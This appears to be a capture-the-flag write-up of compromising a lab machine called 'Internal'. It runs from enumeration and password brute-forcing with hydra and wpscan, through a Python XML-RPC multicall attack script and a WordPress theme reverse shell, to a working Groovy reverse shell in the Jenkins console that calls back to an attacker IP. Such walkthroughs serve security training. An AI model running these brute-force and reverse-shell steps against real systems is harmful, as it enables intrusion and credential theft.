
Internal THM{}

80 (WordPress)

First we add internal.thm to /etc/hosts, pointing it at 10.10.221.255.

Nmap

nmap -A -T4 -p- -sC 10.10.221.255

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

Gobuster

gobuster dir -u http://internal.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]

Gobuster /blog

/wp-content           (Status: 301) [Size: 322] [--> http://internal.thm/blog/wp-content/]
/wp-includes          (Status: 301) [Size: 323] [--> http://internal.thm/blog/wp-includes/]
/wp-admin             (Status: 301) [Size: 320] [--> http://internal.thm/blog/wp-admin/]

Gobuster /wordpress

(notes in parentheses are what each path returned when visited in a browser)

/wp-content           (Status: 301) [Size: 327] [--> http://internal.thm/wordpress/wp-content/]   (white background)
/wp-includes          (Status: 301) [Size: 328] [--> http://internal.thm/wordpress/wp-includes/]  (forbidden)
/wp-admin             (Status: 301) [Size: 325] [--> http://internal.thm/wordpress/wp-admin/]     (WordPress login)

Gobuster /javascript

/prototype            (Status: 301) [Size: 327] [--> http://internal.thm/javascript/prototype/]      (forbidden)
/scriptaculous        (Status: 301) [Size: 331] [--> http://internal.thm/javascript/scriptaculous/]  (forbidden)
/jquery               (Status: 301) [Size: 324] [--> http://internal.thm/javascript/jquery/]         (forbidden)

Gobuster /phpmyadmin

/templates            (Status: 403) [Size: 277]                                                   (forbidden)
/themes               (Status: 301) [Size: 324] [--> http://internal.thm/phpmyadmin/themes/]      (forbidden)
/doc                  (Status: 301) [Size: 321] [--> http://internal.thm/phpmyadmin/doc/]         (forbidden)
/js                   (Status: 301) [Size: 320] [--> http://internal.thm/phpmyadmin/js/]          (forbidden)
/libraries            (Status: 403) [Size: 277]                                                   (forbidden)
/setup                                                                                            (login page, interesting)
/sql                  (Status: 301) [Size: 321] [--> http://internal.thm/phpmyadmin/sql/]         (forbidden)
/locale               (Status: 301) [Size: 324] [--> http://internal.thm/phpmyadmin/locale/]      (forbidden)

Tried hydra against the setup page with HTTP Basic authentication:

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz internal.thm http-get /phpmyadmin/setup

but obtained nothing. Two caveats for anyone repeating this: hydra reads plain-text wordlists, so rockyou.txt.gz must be decompressed first, and the http-get module only sends Basic-auth credentials, so it is only useful where the page answers with a 401 challenge rather than an HTML login form.

Nikto

nikto -h internal.thm

+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5abef58e962a5, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /blog/wp-login.php: Wordpress login found

wpscan

Because we know that the server is running WordPress, we can use wpscan to enumerate users (-e u):

wpscan --url http://internal.thm/blog -e u

[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

So the only user is admin. With wpscan we can try to brute-force that account's password:

wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys
Trying admin / bratz1 Time: 00:03:06 < > (3885 / 14348277) 0.02% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: admin, Password: my2boys

And that's our password.
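To make explicit what wpscan's "password attack on Xmlrpc" does, here is an added example that is not code from this writeup or from wpscan: it builds the wp.getUsersBlogs calls that WordPress's /xmlrpc.php endpoint authenticates, packs many guesses into one system.multicall request (which is why the XML-RPC route is faster than posting to wp-login.php), and classifies the responses. It uses only the Python standard library; the fake_wordpress responder and the credentials it accepts are constructed so the example runs offline, and the post() callback is where a real HTTP client would go.

```python
"""Added example: the mechanics of a WordPress XML-RPC password attack.
Not from the page or from wpscan; standard library only."""
import xmlrpc.client

WP_XMLRPC = "/xmlrpc.php"  # WordPress endpoint that wpscan's "Xmlrpc" attack posts to


def build_probe(username, password):
    """One wp.getUsersBlogs call: WordPress authenticates the pair and returns
    the user's blog list on success or fault 403 on failure."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")


def build_multicall(username, passwords):
    """Pack many guesses into one system.multicall request: one POST, N checks."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, p]} for p in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def classify(response_xml):
    """'valid' if the response carries a blog list, 'invalid' on fault 403,
    otherwise 'unknown' (XML-RPC disabled, method blocked by a plugin, ...)."""
    try:
        params, _ = xmlrpc.client.loads(response_xml)
    except xmlrpc.client.Fault as fault:
        return "invalid" if fault.faultCode == 403 else "unknown"
    except Exception:
        return "unknown"
    return "valid" if params and isinstance(params[0], list) else "unknown"


def classify_multicall(response_xml):
    """Map each element of a system.multicall response to valid/invalid/unknown.
    Per the multicall convention a successful call is a one-element array and a
    failed call is a struct carrying faultCode/faultString."""
    try:
        (results,), _ = xmlrpc.client.loads(response_xml)
    except Exception:
        return []
    verdicts = []
    for item in results:
        if isinstance(item, dict):
            verdicts.append("invalid" if item.get("faultCode") == 403 else "unknown")
        elif isinstance(item, list):
            verdicts.append("valid")
        else:
            verdicts.append("unknown")
    return verdicts


def find_password(username, candidates, post, batch=50):
    """Drive the attack through a caller-supplied post(path, body) -> response_xml.
    Returns the first password that authenticates, or None."""
    candidates = list(candidates)
    for i in range(0, len(candidates), batch):
        chunk = candidates[i:i + batch]
        verdicts = classify_multicall(post(WP_XMLRPC, build_multicall(username, chunk)))
        for password, verdict in zip(chunk, verdicts):
            if verdict == "valid":
                return password
    return None


# Constructed stand-in for /xmlrpc.php so the example runs offline (not a real server).
def fake_wordpress(valid_user, valid_pass):
    blogs = [{"isAdmin": True, "url": "http://internal.thm/blog/", "blogid": "1"}]

    def post(path, body):
        assert path == WP_XMLRPC
        params, method = xmlrpc.client.loads(body)
        if method == "wp.getUsersBlogs":
            if (params[0], params[1]) == (valid_user, valid_pass):
                return xmlrpc.client.dumps((blogs,), methodresponse=True)
            return xmlrpc.client.dumps(xmlrpc.client.Fault(403, "Incorrect username or password."))
        if method == "system.multicall":
            results = []
            for call in params[0]:
                user, pw = call["params"]
                if (user, pw) == (valid_user, valid_pass):
                    results.append([blogs])  # success: one-element array
                else:
                    results.append({"faultCode": 403, "faultString": "Incorrect username or password."})
            return xmlrpc.client.dumps((results,), methodresponse=True)
        return xmlrpc.client.dumps(xmlrpc.client.Fault(-32601, "requested method not found"))

    return post


if __name__ == "__main__":
    server = fake_wordpress("admin", "my2boys")
    print(find_password("admin", ["bratz1", "password", "my2boys", "letmein"], server, batch=2))
```

The defensive reading of the same code: a single POST to /xmlrpc.php that carries a system.multicall with dozens of wp.getUsersBlogs entries is exactly the pattern to alert on, and disabling XML-RPC (or at least system.multicall) where it is not needed removes this amplification.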

After investigating a bit, we find this information in a post inside the WordPress admin area: Don't forget to reset Will's credentials. william:arnold147

Wordpress

Now that we have admin access to WordPress, we can get a reverse shell by editing a theme file, as described at https://www.hacknos.com/wordpress-shell-upload/ (the 404.php method): in the theme editor, replace the contents of the active theme's 404.php with the pentestmonkey PHP reverse shell (https://github.com/pentestmonkey/php-reverse-shell) configured with our IP and port 5555, start nc -lvnp 5555 on our machine, and request that 404.php under wp-content/themes/ to trigger it.

Shell

We upgrade the shell to a fully interactive TTY following https://www.metahackers.pro/upgrade-shell-to-fully-interactive-tty-shell/ and then find this in a file under /opt:


Aubreanna needed these credentials for something later. Let her know you have them and where they are.

aubreanna:bubb13guM!@#123

With those credentials we can SSH in as aubreanna and read the first flag in her home directory. We also find this information in a file in the home directory:

Internal Jenkins service is running on 172.17.0.2:8080

Jenkins is bound to 172.17.0.2, a Docker bridge address reachable only from the host itself, so we cannot browse to it directly. Instead we use SSH local port forwarding to map Jenkins' ip:port onto our attacking machine. From the attacker's (Kali) terminal execute

ssh -L 6767:172.17.0.2:8080 aubreanna@internal.thm

and type the password which we retrieved from the wp-save.txt file. The forward lives as long as that SSH session, and Jenkins is then reachable by typing localhost:6767 in a browser on the local machine (the login page appearing there confirms the tunnel works).

Jenkins

None of the credentials found so far work on Jenkins, so we brute-force the login form with hydra. The target is the local end of the tunnel, so the host is 127.0.0.1 with the port given by -s 6767, and the string after the last colon is the text Jenkins returns on a failed login, which hydra uses to tell failure from success:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 6767 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password'

And that is the result

[6767][http-post-form] host: 127.0.0.1   login: admin   password: spongebob

Some searching shows that the Jenkins Script Console (Manage Jenkins > Script Console) runs arbitrary Groovy on the Jenkins host, so an admin account gives us code execution. We start nc -lvnp 5555 on our local machine and then execute this code in the console (10.11.62.63 is our attacking machine's IP):

// Attacker listener (our nc -lvnp 5555)
String host = "10.11.62.63";
int port = 5555;
String cmd = "/bin/bash";
// Spawn bash with stderr merged into stdout, then connect back to the listener
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Pump bytes between the shell and the socket until either side goes away
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Now we have a reverse shell as the jenkins user. Because linpeas.sh turns up nothing interesting, we look manually. The glob is quoted so the shell does not expand it in the current directory, and stderr is discarded to hide permission-denied noise:

jenkins@jenkins:/$ find / -name '*.txt' 2>/dev/null
/opt/note.txt
jenkins@jenkins:/$ cat /opt/note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.

root:tr0ub13guM!@#123